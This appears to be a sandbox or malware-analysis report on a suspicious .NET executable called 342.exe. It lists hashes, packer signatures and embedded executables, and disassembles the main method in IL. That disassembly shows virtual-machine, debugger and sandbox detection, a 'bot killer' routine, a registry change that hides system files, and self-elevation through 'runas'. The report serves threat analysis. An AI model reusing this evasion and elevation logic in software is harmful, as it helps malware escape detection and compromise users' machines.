Suspicious
Suspect

fd8c3380af01e1ed70f4a7ce76b27eb8

PE Executable | MD5: fd8c3380af01e1ed70f4a7ce76b27eb8 | Size: 28.77 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Very low

Hash
Hash Value
MD5
fd8c3380af01e1ed70f4a7ce76b27eb8
Sha1
82461a16e8862fc94d89ad3ce816b0f70c000801
Sha256
2390425e802f528531bd72d05ffbd96a8205955887aa91ceac334fd995540cb6
Sha384
e775ef6f5434bf6357c304edc8389c0fa08ff51ecb78dd36915be3827ccebcbb9c124dbd841505af9aaf06d1b446ed83
Sha512
36afdb0f477b6ccdbbc7e3b399dcaca671fa86dbe477f7f4613d38c23565e568fd46de9b300d5683ceb03015cccce209b6f9d6e893be2295a67ba63bdbdee66c
SSDeep
393216:xwehPyoD3R76vcMEvWV3XRXD1EeEBcYUsXm7HOjrWBhihFAeVmcHGx/YhXTs:uehaMAv3EvOXqKyfWBhiS6G4T
TLSH
0357332DD68C388CDEE7DC332434C91220BA9EBC8A9B5750751B2A14ED046F69BF5367

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
tlqnsetveso.Resources
4197CA333455.exe
dddd.exe
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

342.exe

Full Name

342.exe

EntryPoint

System.Void Program::Main()

Scope Name

342.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

342

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

36

Main Method

System.Void Program::Main()

Main IL Instruction Count

84

Main IL

ldc.i4 2000
call System.Void System.Threading.Thread::Sleep(System.Int32)
call System.Boolean Program::CreateMutex()
brtrue.s IL_001B: call System.Boolean Program::DetectVirtualMachine()
call System.Int32 System.Environment::get_ExitCode()
call System.Void System.Environment::Exit(System.Int32)
call System.Boolean Program::DetectVirtualMachine()
call System.Boolean Program::Emulator()
or <null>
call System.Boolean Program::DetectDebugger()
or <null>
call System.Boolean Program::DetectSandboxie()
or <null>
call System.Boolean Program::anyrun()
or <null>
brfalse.s IL_0040: leave.s IL_0050
ldnull <null>
call System.Void System.Environment::FailFast(System.String)
leave.s IL_0050: call System.Void Program::RunBotKiller()
dup <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
stloc.0 <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_0050: call System.Void Program::RunBotKiller()
call System.Void Program::RunBotKiller()
call My.MyComputer My.MyProject::get_Computer()
callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry()
callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser()
ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ldc.i4.1 <null>
callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean)
stloc.1 <null>
ldloc.1 <null>
ldstr ShowSuperHidden
callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String)
ldc.i4.1 <null>
box System.Int32
ldc.i4.0 <null>
call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean)
brfalse.s IL_009A: leave.s IL_00AA
ldloc.1 <null>
ldstr ShowSuperHidden
ldc.i4.0 <null>
box System.Int32
callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object)
leave.s IL_00AA: call System.Boolean Program::AdminCheck()
dup <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
stloc.2 <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_00AA: call System.Boolean Program::AdminCheck()
call System.Boolean Program::AdminCheck()
brtrue.s IL_010C: ldnull
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
stloc.3 <null>
ldloc.3 <null>
call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess()
callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule()
callvirt System.String System.Diagnostics.ProcessModule::get_FileName()
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
ldloc.3 <null>
ldstr runas
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String)
ldloc.3 <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
ldloc.3 <null>
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
pop <null>
call System.Int32 System.Environment::get_ExitCode()
call System.Void System.Environment::Exit(System.Int32)
leave.s IL_010A: br.s IL_0113
dup <null>
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception)
stloc.s V_4
call System.Int32 System.Environment::get_ExitCode()
call System.Void System.Environment::Exit(System.Int32)
call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
leave.s IL_010A: br.s IL_0113
br.s IL_0113: ret
ldnull <null>
call System.Object Program::WorkF(System.Object)
pop <null>
ret <null>
